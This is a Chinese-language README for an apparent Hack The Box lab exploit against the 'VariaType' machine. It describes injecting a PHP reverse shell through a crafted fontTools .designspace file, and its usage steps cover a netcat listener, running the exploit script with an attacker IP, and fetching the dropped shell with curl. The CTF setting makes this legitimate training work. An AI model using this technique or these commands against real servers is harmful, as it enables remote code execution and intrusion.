此仓库包含针对 Hack The Box 上 VariaType 机器的专用漏洞利用工具。该漏洞利用利用了 fontTools 库或 Web 应用程序处理 .designspace XML 文件和元数据插值时的漏洞,以实现远程代码执行 (RCE)。
该漏洞存在于字体生成过程中。通过构造恶意的 designspace 文件,我们可以将 PHP 反向 shell 载荷注入到字体的元数据中(特别是 <labelname> 字段)。当服务器处理这些文件以生成可变字体时,它会将输出写入用户定义的路径,从而允许我们将 .php shell 放置在 web 根目录中。
fontTools 创建有效的 source-light.ttf 和 source-regular.ttf 主字体。designspace 文件。.php 文件。您必须安装 Python 3 以及以下库:
pip install fontTools requests
在您的本地机器(或 Pwnbox)上启动 Netcat 监听器:
nc -lvnp 4444
通过提供您的 HTB VPN IP 和监听端口执行脚本:
python3 exploit.py --ip <YOUR_IP> --port 4444
如果上传返回 200 OK(有时甚至是 500,如果处理在错误发生之前完成),脚本将提供文件名。通过 curl 或浏览器访问:
curl http://portal.variatype.htb/shell_xxxxxx.php
此脚本仅用于教育目的和授权的渗透测试。未经授权访问或攻击目标是违法的。
README.md。exploit.py,或更新上述命令中的文件名。| 参数 | 描述 | 默认值 |
|---|
--ip | 您的监听器 IP(VPN) | 必需 |
--port | 您的监听器端口 | 必需 |
--path | shell 的目标路径 | /var/www/portal.variatype.htb/public |
--url | 上传端点 | http://variatype.htb/tools/.../process |